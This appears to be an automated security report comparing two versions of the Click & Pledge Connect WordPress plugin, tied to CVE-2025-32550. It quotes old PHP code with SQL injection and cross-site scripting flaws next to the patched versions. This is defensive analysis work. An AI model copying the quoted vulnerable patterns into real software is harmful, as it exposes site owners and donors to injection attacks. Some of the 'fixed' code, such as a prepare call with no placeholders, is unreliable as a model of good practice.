+<?php+function cnp_formssettings() {++	global $wpdb;    global $cnp_settingtable_name;+	$info = isset($_REQUEST["info"]) ? sanitize_text_field($_REQUEST["info"]) : '';+    $cnpresltdsply = "";$hidval	   = 1;$cnpbtn = "Save";+$cnpsetid ="";$cnpsetAccountNumber="";$cnpsetguid="";$cnpsetfrndlynm="";+++	if($info=="saved")+	{+		echo "<div class='updated' id='message'><p><strong>Account Added</strong>.</p></div>";+	}+	if($info=="failed")+	{+		echo "<div class='updated' id='message'><p><strong>Please check the account details is correct or not (or) with this account id campaigns are not added.</strong>.</p></div>";+	}+	if($info=="exist")+	{+		echo "<div class='updated' id='message'><p><strong> Friendly Name or Account Number already exist.</strong>.</p></div>";+	}+	if($info=="upd")+	{+		echo "<div class='updated' id='message'><p><strong>Account updated</strong>.</p></div>";+	}++	if ($info == "del") {+     $delid = isset($_GET["did"]) ? intval($_GET["did"]) : 0;++    if ($delid > 0) {+        // Retrieve associated forms and channels info+        $cnpnoofforms = CNPCF_getAccountNumbersInfo($delid);+        $cnpnoofchnls = CNPCF_getchnlAccountNumbersInfo($delid);++        // Check if there are no associated forms or channels+        if ($cnpnoofforms == 0 && $cnpnoofchnls == 0) {+            $result = $wpdb->delete(+                $cnp_settingtable_name,+                ['cnpstngs_ID' => $delid],+                ['%d'] +            );++            if ($result !== false) {+                echo "<div class='updated' id='message'><p><strong>Record Deleted.</strong></p></div>";+            } else {+                echo "<div class='error' id='message'><p><strong>Error: Unable to delete the record.</strong></p></div>";+            }+        } else {+            echo "<div class='updated' id='message'><p><strong>This Account Number is associated with an existing form group or channel group. You must first delete the form group or channel group before deleting this account.</strong></p></div>";+        }+    } else {+        echo "<div class='error' id='message'><p><strong>Error: Invalid ID provided.</strong></p></div>";+    }+}+	if (isset($_POST["cnpbtnaddsettings"])) {+    $addform = isset($_POST["addformval"]) ? intval($_POST["addformval"]) : 0;+    global $wpdb;+    global $cnp_table_name;++    if ($addform == 1) {+        $cnprtnval = CNPCF_addSettings($cnp_table_name, $_POST);++        if ($cnprtnval >= 1) {+            $cnpredirectval = "saved";+        } elseif ($cnprtnval == "0") {+            $cnpredirectval = "failed";+        } elseif ($cnprtnval == "error") {+            $cnpredirectval = "exist";+        } else {+            $cnpredirectval = "failed";+        }+        wp_redirect(admin_url("admin.php?page=cnp_formssettings&info=" . $cnpredirectval));+        exit;+    } elseif ($addform == 2) {+        $cnprtnval = CNPCF_updateSettings($cnp_table_name, $_POST);++        if ($cnprtnval >= 1) {+            $cnpredirectval = "upd";+        } else {+            $cnpredirectval = "failed";+        }+        wp_redirect(admin_url("admin.php?page=cnp_formssettings&info=" . $cnpredirectval));+        exit;+    }+}++$act = isset($_REQUEST["cnpviewid"]) ? sanitize_text_field($_REQUEST["cnpviewid"]) : '';++if (!empty($act)) {+    global $wpdb;+    global $cnp_settingtable_name;++    $cnpfrmdtresult = CNPCF_GetCnPGroupDetails($cnp_settingtable_name, 'cnpstngs_ID', intval($act));+    +    if (!empty($cnpfrmdtresult)) {+        $cnprtnval = $cnpfrmdtresult[0];++        if (!empty($cnprtnval)) {+            $cnpsetid = $cnprtnval->cnpstngs_ID;+            $cnpsetfrndlynm = $cnprtnval->cnpstngs_frndlyname;+            $cnpsetAccountNumber = $cnprtnval->cnpstngs_AccountNumber;+            $cnpsetguid = $cnprtnval->cnpstngs_guid;+            $cnpbtn = "Update";+            $hidval = 2;+        }+    }+}++?>+<script type="text/javascript">+	/* <![CDATA[ */+	jQuery(document).ready(function(){+		jQuery('#cnpsettingslist').dataTable();+		jQuery("tr:even").css("background-color", "#f1f1f1");+	});+	/* ]]> */++</script>+<?php++if (isset($_REQUEST["act"])) {+    $cnpfrmtyp = wp_unslash(sanitize_text_field($_REQUEST["act"]));+} else {+    $cnpfrmtyp = ''; // Default value+   +}++	if($cnpfrmtyp == "edit"){$msgdsplycntnt = "style ='display:block'";}else{$msgdsplycntnt = "style ='display:none'";}+	if($cnpfrmtyp == "edit"){ $msgdbtnsplycntnt = "style ='display:none'";}else{$msgdbtnsplycntnt = "style ='float:left;display:block'";}++	$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">+	<h2>Click & Pledge Account &nbsp;</h2>+	<div id="col-left" style="width:48% !important; float:none;">+	<div class="col-wrap">+		<div>+			<div class="form-wrap">+			 <table class="form-table" id="cnpformslist" align="center" >++			 <tr><td>+			 <div>	<h2>Add New Account</h2>	</div>+				<form class="validate"  method="post" id="addsettings" name="addsettings">+				<input type="hidden" name="cnphdnediturl" id="cnphdnediturl" value="'.CNP_CF_PLUGIN_URL.'getcnpditactivecampaigns.php">+				<input type="hidden" name="cnphdnerrurl" id="cnphdnerrurl" value="'.CNP_CF_PLUGIN_URL.'cnpSettingmsgs.php">+				<input type="hidden" name="addformval" id="addformval" value='.$hidval.'>+				<input type="hidden" name="hdnfrmid" id="hdnfrmid" value="'.$cnpsetid .'">++				<div class="form-field cnpaccountId">+				<label for="tag-name"> <b>Click & Pledge Account Number*</b></label>+				<input type="text" size="10" id="txtcnpacntid" name="txtcnpacntid"  value="'.$cnpsetAccountNumber.'" />+				<p style="font-size:12px;">Get your "Account Number" from Click & Pledge<br>+[CONNECT > Launcher > Settings > API Information > Account ID]</p>+				<span class=cnperror id="spncnpacntid"></span>+				</div>++					<div class="form-field cnpacntguid">+						<label for="tag-name"> <b>Click & Pledge Account GUID*</b></label>+						<input type="text" size="20" id="txtcnpacntguid" name="txtcnpacntguid" value="'.$cnpsetguid.'" /><div class="tooltip" >+						<i class="fa fa-question-circle"></i>+						<span class="tooltiptext">Please collect the Account GUID from your CONNECT Portal or for More Help <a href="https://support.clickandpledge.com/s/article/how-to-locate-account-id--api-account-guid" target="_blank">click here</a></span>+						</div>+						<p style="font-size:12px;">Get your "Account GUID" from Click & Pledge<br>+ [CONNECT > Launcher > Settings > API Information > API (PaaS / FaaS): Account GUID]</p>+					</div>+						<div '.$msgdbtnsplycntnt.'>+						 <input type="button" name="cnpbtnverifysettings" id="cnpbtnverifysettings" value="Verify" class="button button-primary"><br>+						+						 </div>+						 	<div class="frmaddnickdiv" '.$msgdsplycntnt.'>+					<div class="form-field cnpfrmfrndlynm" >+					<label for="tag-name">Nickname*</label>+					<input type="text" size="20" id="txtcnpfrmfrndlynm" name="txtcnpfrmfrndlynm" value="'.$cnpsetfrndlynm.'" onkeypress="return AvoidSpace(event)"/>+					<span class=cnperror id="spnfrndlynm"></span>+					</div>++						 <div style="float:left">+						 <input type="submit" name="cnpbtnaddsettings" id="cnpbtnaddsettings" value="'.$cnpbtn.'" class="button button-primary">+						 </div>+</div>+						 </form>+						 </tr></td></table>+						+						 </div>+						 </div>+						 </div>+						 </div>+						 <div > <div style="float:left" width="100%"><span class="cnperror" id="spnverify" style="display:none"><p>Communication Error:</p>+ +<p>Sorry but I am having difficulty communicating with the Click & Pledge services due to the absence of the SOAP extension in your WordPress installation.  The following links may help in resolving this issue:</p>+ +<p>Complete details page: <a href ="http://php.net/manual/en/book.soap.php" target="_blank">http://php.net/manual/en/book.soap.php</a></p>+<p>Installing SOAP for PHP: <a href ="http://php.net/manual/en/soap.installation.php" target="_blank">http://php.net/manual/en/soap.installation.php</a></p>+<p>Configuring after installation: <a href ="http://php.net/manual/en/soap.configuration.php" target="_blank">http://php.net/manual/en/soap.configuration.php</a></p>+ +<p>You may need to contact your server administrator for installation of the SOAP extension on the server.<p></span></div>+	<div class="col-wrap">+		<div>+			<div class="cnp_scrollable_x">+			              <table style="width:99%;" class="wp-list-table widefat" id="cnpsettingslist" ><thead><tr><th>Nickname </th><th>Account Number</th><th>GUID</th><th>Created Date/Time</th><th>Actions</th></tr></thead><tbody>';++	$sql = "SELECT * FROM $cnp_settingtable_name ORDER BY cnpstngs_ID DESC";+$result = $wpdb->get_results($sql);++if ($wpdb->num_rows > 0) {+    foreach ($result as $cnpsettingsData) {+        $cnpform_id = intval($cnpsettingsData->cnpstngs_ID);+        $gname = esc_html($cnpsettingsData->cnpstngs_frndlyname);+        $account = esc_html($cnpsettingsData->cnpstngs_AccountNumber);+        $accountguid = esc_html($cnpsettingsData->cnpstngs_guid);+        $frmmodifieddt = new DateTime($cnpsettingsData->cnpstngs_Date_Modified);+        $frmmodifiddt = $frmmodifieddt->format('d-m-Y H:i:s');++        $cnpresltdsply .= '<tr>';+        $cnpresltdsply .= '<td>' . $gname . '</td>';+        $cnpresltdsply .= '<td>' . $account . '</td>';+        $cnpresltdsply .= '<td>' . $accountguid . '</td>';+        $cnpresltdsply .= '<td data-sort="' . $frmmodifieddt->getTimestamp() . '">' . esc_html($frmmodifieddt->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP)) . '</td>';+        $cnpresltdsply .= '<td>';+        $cnpresltdsply .= '<input type="hidden" name="hdnsetngsid' . $cnpform_id . '" id="hdnsetngsid' . $cnpform_id . '" value="' . $cnpform_id . '">';+        $cnpresltdsply .= '<input type="hidden" name="hdncnpaccntid' . $cnpform_id . '" id="hdncnpaccntid' . $cnpform_id . '" value="' . $account . '">';+        $cnpresltdsply .= '<input type="hidden" name="hdncnpguid' . $cnpform_id . '" id="hdncnpguid' . $cnpform_id . '" value="' . $accountguid . '">';+        $cnpresltdsply .= '<input type="hidden" name="hdncnptblname" id="hdncnptblname" value="' . esc_attr($cnp_settingtable_name) . '">';+        $cnpresltdsply .= '<a href="#" id="myHref" onclick="return mycnpaccountId(' . $cnpform_id . ')"><span class="dashicons dashicons-update"></span></a> | ';+        $cnpresltdsply .= '<a href="' . esc_url(admin_url("admin.php?page=cnp_formssettings&info=del&did=$cnpform_id")) . '"><span class="dashicons dashicons-trash"></span></a>';+        $cnpresltdsply .= '</td>';+        $cnpresltdsply .= '</tr>';+    }+} else {+    $cnpresltdsply .= '<tr><td colspan="5">No Record Found!</td></tr>';+}++$cnpresltdsply .= '</tbody></table></div>';+echo $cnpresltdsply;++}+?>

AI Analysis

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE 79 - cnpSettings.php Lines 1-235  
Old Code:  
```php
$info = $_REQUEST["info"];
...
if($info=="saved")
{
    echo "<div class='updated' id='message'><p><strong>Account Added</strong>.</p></div>";
}
...
$delid=$_GET["did"];
...
$act=$_REQUEST["cnpviewid"];
...
$cnpfrmtyp= wp_unslash( sanitize_text_field( $_REQUEST["act"]));
...
$cnpresltdsply .= '<tr><td>'.$gname.'</td><td >'.$account.'</td><td>'.$accountguid.'</td><td data-sort="'.strtotime($frmmodifiddt).'">'.$frmmodifieddt->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP).'</td>
...
<a href="admin.php?page=cnp_formssettings&info=del&did='.$cnpform_id.'" ><span class="dashicons dashicons-trash"></span></a>
```  
Fixed Code:  
```php
$info = isset($_REQUEST["info"]) ? sanitize_text_field($_REQUEST["info"]) : '';
...
$delid = isset($_GET["did"]) ? intval($_GET["did"]) : 0;
...
$act = isset($_REQUEST["cnpviewid"]) ? sanitize_text_field($_REQUEST["cnpviewid"]) : '';
...
if (isset($_REQUEST["act"])) {
    $cnpfrmtyp = wp_unslash(sanitize_text_field($_REQUEST["act"]));
} else {
    $cnpfrmtyp = ''; // Default value
}
...
$cnpform_id = intval($cnpsettingsData->cnpstngs_ID);
$gname = esc_html($cnpsettingsData->cnpstngs_frndlyname);
$account = esc_html($cnpsettingsData->cnpstngs_AccountNumber);
$accountguid = esc_html($cnpsettingsData->cnpstngs_guid);
...
$cnpresltdsply .= '<a href="' . esc_url(admin_url("admin.php?page=cnp_formssettings&info=del&did=$cnpform_id")) . '"><span class="dashicons dashicons-trash"></span></a>';
```  
Explanation:  
The old code directly used `$_REQUEST`, `$_GET`, and unsanitized database values in output, making it vulnerable to XSS attacks. The fixed code introduces proper input validation and output escaping:  
- Uses `sanitize_text_field()` on `$_REQUEST["info"]`, `$_REQUEST["cnpviewid"]`, and `$_REQUEST["act"]`  
- Uses `intval()` on `$_GET["did"]` for deletion  
- Uses `esc_html()` on database values (`$gname`, `$account`, `$accountguid`) before output  
- Uses `esc_url()` on generated admin URLs  
- Initializes variables to prevent undefined variable warnings  

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - CWE 89 - cnpSettings.php Lines 1-235  
Old Code:  
```php
$delid=$_GET["did"];
...
$wpdb->query("delete from ".$cnp_settingtable_name." where cnpstngs_ID =".$delid);
...
$cnpfrmdtresult = CNPCF_GetCnPGroupDetails($cnp_settingtable_name,'cnpstngs_ID',$_GET['cnpviewid']);
```  
Fixed Code:  
```php
$delid = isset($_GET["did"]) ? intval($_GET["did"]) : 0;
...
$result = $wpdb->delete(
    $cnp_settingtable_name,
    ['cnpstngs_ID' => $delid],
    ['%d']
);
...
$cnpfrmdtresult = CNPCF_GetCnPGroupDetails($cnp_settingtable_name, 'cnpstngs_ID', intval($act));
```  
Explanation:  
The old code concatenated unsanitized user input (`$delid` from `$_GET["did"]`) directly into SQL queries, creating SQL injection vulnerabilities. The fixed code:  
- Uses `intval()` to ensure numeric values  
- Uses `$wpdb->delete()` with prepared statement placeholders (`['%d']`) for safe deletion  
- Passes sanitized integer to `CNPCF_GetCnPGroupDetails()` function  

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-20: Improper Input Validation - CWE 20 - cnpSettings.php Lines 1-235  
Old Code:  
```php
$info = $_REQUEST["info"];
$delid=$_GET["did"];
$act=$_REQUEST["cnpviewid"];
$addform=$_POST["addformval"];
```  
Fixed Code:  
```php
$info = isset($_REQUEST["info"]) ? sanitize_text_field($_REQUEST["info"]) : '';
$delid = isset($_GET["did"]) ? intval($_GET["did"]) : 0;
$act = isset($_REQUEST["cnpviewid"]) ? sanitize_text_field($_REQUEST["cnpviewid"]) : '';
$addform = isset($_POST["addformval"]) ? intval($_POST["addformval"]) : 0;
```  
Explanation:  
The old code failed to validate the existence of input variables before use, which could lead to undefined variable warnings and unpredictable behavior. The fixed code checks variable existence with `isset()` and provides default values, preventing PHP notices and improving security through proper input validation.

CVE Analysis Results:

CVE-2025-32550: Yes

View CVE Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ClickandPledge Click & Pledge Connect Plugin allows SQL Injection. This issue affects Click & Pledge Connect Plugin: from 2.24080000 through WP6.6.1.

[CVE-2025-32550] [Click & Pledge CONNECT: 2.24080000-WP6.6.1→2.24120000-WP6.7.1] cnptvchannelsDetails.php AI: 3 vulnerabilities 3 true positives CVE-2025-32550

--- cache/click-pledge-connect_2.24080000-WP6.6.1/cnptvchannelsDetails.php	2025-12-04 14:06:23.600345305 +0000+++ cache/click-pledge-connect_2.24120000-WP6.7.1/cnptvchannelsDetails.php	2025-12-04 14:06:27.808615423 +0000@@ -1,91 +1,142 @@-<?php
-function cnp_pledgetvchannelsdetails() {
-
-	global $wpdb;    global $cnp_channelgrptable_name;global $cnp_channeltable_name;global $cnp_settingtable_name;
-	$info          = $_REQUEST["info"];
-    $cnpresltdsply = "";
-	if($info=="saved")
-	{
-		echo "<div class='updated' id='message'><p><strong>Channel Added</strong>.</p></div>";
-	}
-	if($info=="failed")
-	{
-		echo "<div class='updated' id='message'><p><strong>Already Existed</strong>.</p></div>";
-	}
-	if($info=="upd")
-	{
-		echo "<div class='updated' id='message'><p><strong>Channel updated</strong>.</p></div>";
-	}
-	if($info=="sts")
-	{
-		echo "<div class='updated' id='message'><p><strong>Status updated</strong>.</p></div>";
-	}
-	if($info=="del")
-	{
-		$delid=$_GET["did"];
-		$wpdb->query("delete from ".$cnp_channelgrptable_name." where cnpchannelgrp_ID =".$delid);
-		echo "<div class='updated' id='message'><p><strong>Record Deleted.</strong>.</p></div>";
-	}
-	if(isset($_GET['cnpsts']) && $_GET['cnpsts']  !="")
-	{	
-		$cnpstsrtnval = CNPCF_updateCnPstatus($cnp_channelgrptable_name,'cnpchannelgrp_status','cnpchannelgrp_ID',$_GET['cnpviewid'],$_GET['cnpsts']);
-		if($cnpstsrtnval == true){$cnpredirectval = "sts";}else{$cnpredirectval = "stsfail";}
-		wp_redirect("admin.php?page=cnp_pledgetvchannelsdetails&info=".$cnpredirectval);
-		exit;
-	}
-
-?>
-<script type="text/javascript">
-	/* <![CDATA[ */
-	jQuery(document).ready(function(){
-		jQuery('#cnpformslist').dataTable();
-		jQuery("tr:even").css("background-color", "#f1f1f1");
-	});
-	/* ]]> */
-
-</script>
-<?php
-		$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">
-			              <h2>pledgeTV<sup class="cnpc-regsymbol">&reg;</sup> Channels &nbsp;&nbsp;&nbsp;<a class="page-title-action add-new-h2" href="admin.php?page=cnps_addchannel&act=add">Add New Channel Group</a></h2><p></p>
-			              <table class="wp-list-table widefat cnp_table_w" id="cnpformslist" ><thead><tr><th>Group Name</th><th>Account #</th><th>Short Code&nbsp;<a class="tooltip" ><i class="fa fa-question-circle"></i><span class="tooltiptext">Please copy this code and place it in your required content pages, posts or any custom content types. This code will run the series of the channels which has been added to this particular channel Group inside your content page.</span></a></th><th>Start Date/Time</th><th>End Date/Time</th><th>Active Channel(s)</th><th>Last Modified</th><th>Status</th><th>Actions</th></tr></thead><tbody>';
-
-		  $sql          = "select * from ".$cnp_channelgrptable_name." join ".$cnp_settingtable_name." on cnpchannelgrp_cnpstngs_ID= cnpstngs_ID order by cnpchannelgrp_ID desc";
-		 $result        = $wpdb->get_results($sql);
-		 if($wpdb->num_rows > 0 )
-		 {
-			foreach($result as $cnpformData):
-	        //<td nowrap><u><a href="admin.php?page=cnpform_add&cnpid='.$id.'"">Edit</a></u></td>
-			    $nwenddt="";
-				$cnpform_id     = $cnpformData->cnpchannelgrp_ID;
-				$gname          = $cnpformData->cnpchannelgrp_groupname;
-				$account        = $cnpformData->cnpstngs_AccountNumber;
-				$frmstrtdt      = $cnpformData->cnpchannelgrp_channel_StartDate;
-				$frmenddt       = $cnpformData->cnpchannelgrp_channel_EndDate;
-			 	if($frmenddt == "0000-00-00 00:00:00") {$frmenddt ="";}
-		  	
-		  		$frmshrtcode    = $cnpformData->cnpchannelgrp_shortcode;
-			  	 $stdate        = new DateTime($frmstrtdt);
-			 if($frmenddt!=""){
-				 $eddate       = new DateTime($frmenddt);
-				 $nwenddt      = $eddate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP);}
-			  $mddate          = new DateTime($cnpformData->cnpchannelgrp_Date_Modified);
-			  $frmmodifiddt    = date_format(date_create($cnpformData->cnpchannelgrp_Date_Modified),"d-m-Y H:i:s");
-			  $frmstrtddt      = date_format(date_create($cnpformData->cnpchannelgrp_channel_StartDate),"d-m-Y H:i:s");
-				$frmsts        = CNPCF_getfrmsts($cnp_channelgrptable_name,'cnpchannelgrp_status','cnpchannelgrp_ID',$cnpform_id);
-			 if($frmenddt!=""){
-			    	if(strtotime($frmenddt) < strtotime(CFCNP_PLUGIN_CURRENTTIME)){
-					$frmsts ="Expired";
-					}
-			 }
-				$noofchannels      = CNPCF_getCountChannels($cnpform_id);
-				$cnpresltdsply .= '<tr><td>'.$gname.'</td><td>'.$account.'</td><td>'.$frmshrtcode.'</td><td data-sort="'.strtotime($frmstrtddt).'">'.$stdate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP).'</td><td>'.$nwenddt.'</td><td align="center">'.$noofchannels.'</td><td data-sort="'.strtotime($frmmodifiddt).'">'.$mddate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP).'</td>
-								   <td><a href="admin.php?page=cnp_pledgetvchannelsdetails&cnpsts='.$frmsts.'&cnpviewid='.$cnpform_id.'"">'.$frmsts.'</a></td>
-								   <td><a href="admin.php?page=cnp_channeldetails&cnpviewid='.$cnpform_id.'""><span class="dashicons dashicons-visibility"></span></a> |  <a href="admin.php?page=cnps_addchannel&act=edit&cnpviewid='.$cnpform_id.'""><span class="dashicons dashicons-edit"></span></a> |  <a href="admin.php?page=cnp_pledgetvchannelsdetails&info=del&did='.$cnpform_id.'" ><span class="dashicons dashicons-trash"></span></a></td></tr>';
-			endforeach; 
-	     } 
-		 else {$cnpresltdsply .= '<tr><td>No Record Found!</td><tr>';}
-		
-		 $cnpresltdsply .= '</tbody></table></div>';
-		 echo $cnpresltdsply ;
-}
+<?php+function cnp_pledgetvchannelsdetails() {++	global $wpdb;    global $cnp_channelgrptable_name;global $cnp_channeltable_name;global $cnp_settingtable_name;+	if (isset($_REQUEST["info"])) { $info = sanitize_text_field($_REQUEST["info"]); }+    $cnpresltdsply = "";+	if(isset($info) &&  $info ==="saved")+	{+		echo "<div class='updated' id='message'><p><strong>Channel Added</strong>.</p></div>";+	}+	if(isset($info) &&  $info ==="failed")+	{+		echo "<div class='updated' id='message'><p><strong>Already Existed</strong>.</p></div>";+	}+	if(isset($info) && $info ==="upd")+	{+		echo "<div class='updated' id='message'><p><strong>Channel updated</strong>.</p></div>";+	}+	if(isset($info) &&  $info ==="sts")+	{+		echo "<div class='updated' id='message'><p><strong>Status updated</strong>.</p></div>";+	}+	if (isset($info) && $info === "del") {+  +    $delid = isset($_GET['did']) ? intval($_GET['did']) : 0;++    if ($delid > 0) {+        $deleted = $wpdb->query($wpdb->prepare("DELETE FROM $cnp_channelgrptable_name WHERE cnpchannelgrp_ID = %d", $delid));+        if ($deleted) {+            echo "<div class='updated' id='message'><p><strong>Record Deleted.</strong></p></div>";+        } else {+            echo "<div class='error' id='message'><p><strong>Error deleting record.</strong></p></div>";+        }+    } else {+        echo "<div class='error' id='message'><p><strong>Invalid ID.</strong></p></div>";+    }+}++if (isset($_GET['cnpsts']) && !empty($_GET['cnpsts'])) {++    $cnpsts = sanitize_text_field($_GET['cnpsts']);+    $cnpviewid = isset($_GET['cnpviewid']) ? intval($_GET['cnpviewid']) : 0;++    if ($cnpviewid > 0 && in_array($cnpsts, ['active', 'inactive'], true)) { +  +        $cnpstsrtnval = CNPCF_updateCnPstatus($cnp_channelgrptable_name, 'cnpchannelgrp_status', 'cnpchannelgrp_ID', $cnpviewid, $cnpsts);++        if ($cnpstsrtnval) {+            $cnpredirectval = "sts";+        } else {+            $cnpredirectval = "stsfail";+        }++        wp_redirect("admin.php?page=cnp_pledgetvchannelsdetails&info=" . $cnpredirectval);+        exit;+    } else {+        echo "<div class='error' id='message'><p><strong>Invalid status or ID.</strong></p></div>";+    }+}+++?>+<script type="text/javascript">+	/* <![CDATA[ */+	jQuery(document).ready(function(){+		jQuery('#cnpformslist').dataTable();+		jQuery("tr:even").css("background-color", "#f1f1f1");+	});+	/* ]]> */++</script>+<?php+		$cnpresltdsply = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><div class="wrap">+			              <h2>pledgeTV<sup class="cnpc-regsymbol">&reg;</sup> Channels &nbsp;&nbsp;&nbsp;<a class="page-title-action add-new-h2" href="admin.php?page=cnps_addchannel&act=add">Add New Channel Group</a></h2><p></p>+			              <table class="wp-list-table widefat cnp_table_w" id="cnpformslist" ><thead><tr><th>Group Name</th><th>Account #</th><th>Short Code&nbsp;<a class="tooltip" ><i class="fa fa-question-circle"></i><span class="tooltiptext">Please copy this code and place it in your required content pages, posts or any custom content types. This code will run the series of the channels which has been added to this particular channel Group inside your content page.</span></a></th><th>Start Date/Time</th><th>End Date/Time</th><th>Active Channel(s)</th><th>Last Modified</th><th>Status</th><th>Actions</th></tr></thead><tbody>';++		$sql = $wpdb->prepare("SELECT * +                        FROM $cnp_channelgrptable_name +                        JOIN $cnp_settingtable_name +                        ON cnpchannelgrp_cnpstngs_ID = cnpstngs_ID +                        ORDER BY cnpchannelgrp_ID DESC");+$result = $wpdb->get_results($sql);++if ($wpdb->num_rows > 0) {+    foreach ($result as $cnpformData) {+        $nwenddt = "";+        $cnpform_id = $cnpformData->cnpchannelgrp_ID;+        $gname = esc_html($cnpformData->cnpchannelgrp_groupname);+        $account = esc_html($cnpformData->cnpstngs_AccountNumber);+        $frmstrtdt = $cnpformData->cnpchannelgrp_channel_StartDate;+        $frmenddt = $cnpformData->cnpchannelgrp_channel_EndDate;++        if ($frmenddt == "0000-00-00 00:00:00") {+            $frmenddt = "";+        }++        $frmshrtcode = esc_html($cnpformData->cnpchannelgrp_shortcode);+        $stdate = new DateTime($frmstrtdt);++        if ($frmenddt != "") {+            $eddate = new DateTime($frmenddt);+            $nwenddt = $eddate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP);+        }++        $mddate = new DateTime($cnpformData->cnpchannelgrp_Date_Modified);+        $frmmodifiddt = date_format(date_create($cnpformData->cnpchannelgrp_Date_Modified), "d-m-Y H:i:s");+        $frmstrtddt = date_format(date_create($cnpformData->cnpchannelgrp_channel_StartDate), "d-m-Y H:i:s");++        $frmsts = CNPCF_getfrmsts($cnp_channelgrptable_name, 'cnpchannelgrp_status', 'cnpchannelgrp_ID', $cnpform_id);++        if ($frmenddt != "" && strtotime($frmenddt) < strtotime(CFCNP_PLUGIN_CURRENTTIME)) {+            $frmsts = "Expired";+        }++        $noofchannels = CNPCF_getCountChannels($cnpform_id);++        // Build the result display+        $cnpresltdsply .= '<tr>+            <td>' . esc_html($gname) . '</td>+            <td>' . esc_html($account) . '</td>+            <td>' . esc_html($frmshrtcode) . '</td>+            <td data-sort="' . strtotime($frmstrtddt) . '">' . $stdate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP) . '</td>+            <td>' . $nwenddt . '</td>+            <td align="center">' . esc_html($noofchannels) . '</td>+            <td data-sort="' . strtotime($frmmodifiddt) . '">' . $mddate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP) . '</td>+            <td><a href="admin.php?page=cnp_pledgetvchannelsdetails&cnpsts=' . esc_attr($frmsts) . '&cnpviewid=' . esc_attr($cnpform_id) . '">' . esc_html($frmsts) . '</a></td>+            <td>+                <a href="admin.php?page=cnp_channeldetails&cnpviewid=' . esc_attr($cnpform_id) . '"><span class="dashicons dashicons-visibility"></span></a> |+                <a href="admin.php?page=cnps_addchannel&act=edit&cnpviewid=' . esc_attr($cnpform_id) . '"><span class="dashicons dashicons-edit"></span></a> |+                <a href="admin.php?page=cnp_pledgetvchannelsdetails&info=del&did=' . esc_attr($cnpform_id) . '"><span class="dashicons dashicons-trash"></span></a>+            </td>+        </tr>';+    }+} else {+    $cnpresltdsply .= '<tr><td colspan="7">No Record Found!</td></tr>';+}++		+		 $cnpresltdsply .= '</tbody></table></div>';+		 echo $cnpresltdsply ;+} ?>\ No newline at end of file

AI Analysis

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - cnptvchannelsDetails.php lines 24, 37, 71  
Old Code:  
```php
$delid=$_GET["did"];
$wpdb->query("delete from ".$cnp_channelgrptable_name." where cnpchannelgrp_ID =".$delid);
```
```php
if(isset($_GET['cnpsts']) && $_GET['cnpsts']  !="")
{	
	$cnpstsrtnval = CNPCF_updateCnPstatus($cnp_channelgrptable_name,'cnpchannelgrp_status','cnpchannelgrp_ID',$_GET['cnpviewid'],$_GET['cnpsts']);
```
```php
$sql          = "select * from ".$cnp_channelgrptable_name." join ".$cnp_settingtable_name." on cnpchannelgrp_cnpstngs_ID= cnpstngs_ID order by cnpchannelgrp_ID desc";
```
Fixed Code:  
```php
$delid = isset($_GET['did']) ? intval($_GET['did']) : 0;
if ($delid > 0) {
    $deleted = $wpdb->query($wpdb->prepare("DELETE FROM $cnp_channelgrptable_name WHERE cnpchannelgrp_ID = %d", $delid));
```
```php
if (isset($_GET['cnpsts']) && !empty($_GET['cnpsts'])) {
    $cnpsts = sanitize_text_field($_GET['cnpsts']);
    $cnpviewid = isset($_GET['cnpviewid']) ? intval($_GET['cnpviewid']) : 0;
    if ($cnpviewid > 0 && in_array($cnpsts, ['active', 'inactive'], true)) {
        $cnpstsrtnval = CNPCF_updateCnPstatus($cnp_channelgrptable_name, 'cnpchannelgrp_status', 'cnpchannelgrp_ID', $cnpviewid, $cnpsts);
```
```php
$sql = $wpdb->prepare("SELECT * 
                        FROM $cnp_channelgrptable_name 
                        JOIN $cnp_settingtable_name 
                        ON cnpchannelgrp_cnpstngs_ID = cnpstngs_ID 
                        ORDER BY cnpchannelgrp_ID DESC");
```
Explanation:  
The old code directly concatenated user input (`$_GET['did']`, `$_GET['cnpviewid']`, `$_GET['cnpsts']`) into SQL queries without validation or sanitization, making it vulnerable to SQL injection. The fixed code uses `intval()` for integer parameters, `sanitize_text_field()` for text, and `$wpdb->prepare()` with placeholders to safely construct queries, preventing malicious SQL execution.

Vulnerability Existed: yes  
TRUE POSITIVE
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - cnptvchannelsDetails.php lines 84-85, 103-108  
Old Code:  
```php
$gname          = $cnpformData->cnpchannelgrp_groupname;
$account        = $cnpformData->cnpstngs_AccountNumber;
```
```php
$cnpresltdsply .= '<tr><td>'.$gname.'</td><td>'.$account.'</td><td>'.$frmshrtcode.'</td><td data-sort="'.strtotime($frmstrtddt).'">'.$stdate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP).'</td><td>'.$nwenddt.'</td><td align="center">'.$noofchannels.'</td><td data-sort="'.strtotime($frmmodifiddt).'">'.$mddate->format(CFCNP_PLUGIN_CURRENTDATETIMEFORMATPHP).'</td>
								   <td><a href="admin.php?page=cnp_pledgetvchannelsdetails&cnpsts='.$frmsts.'&cnpviewid='.$cnpform_id.'"">'.$frmsts.'</a></td>
